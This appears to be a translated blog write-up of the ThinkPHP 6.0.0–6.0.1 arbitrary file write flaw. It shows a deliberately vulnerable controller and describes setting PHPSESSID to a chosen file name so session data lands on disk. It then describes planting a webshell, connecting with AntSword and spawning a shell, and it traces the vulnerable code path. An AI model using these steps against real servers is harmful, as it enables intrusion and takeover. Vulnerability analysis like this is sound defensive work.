Table of Contents

Foreword

1. Recurrence

two, Vulnerability Analysis

Foreword

Tips: Here you can add the general content to be recorded in this article:

ThinkPHP v6.0.0~6.0.1 has an arbitrary file operation vulnerability. The main reason is that the session is called to write the file, resulting in the vulnerability. The patch detects whether the incoming $sessionId is only composed of letters orComposed of numeric characters.

Tips: The following is the text of this article, and the following cases are for reference

I. Recurrence

The method of customizing a vulnerability on the back-end index/vuln page:public function vuln(Request $request, Session $session){$param = $request->get('param');$session->set('session_key', $param);return "success";}

Visit the index/vuln page, pass in the value of param and modify the PHPSESSID to a 32-bit file name to be written:

Incoming a Trojan horse, try to connect with ant sword

After that, you can try to bounce the shell to directly get the control of the target drone

II. Vulnerability Analysis

The thinkphp framework first calls the handle method to initialize the session, and assigns the value of $cookieName to PHPSESSID through getname()

The value of $cookieName is the defined PHPSESSID. Finally, enter the setId() function to assign the value of $SessionId, that is, the value of PHPSESSID.

No restrictions on $id other than 32-bit length

Finally, enter the save() function to save the session data, add the sess_ prefix, and finally call the file_put_contents() method in the wirteFile() function to write the content

$path is the content of PHPSESSID, and $content is the content of the parameter param, which leads to the writing of any file.

Reference article:​​​​​​ThinkPHP v6.0.0~6.0.1 Arbitrary File Operation Vulnerability Analysis | J0k3r's Blog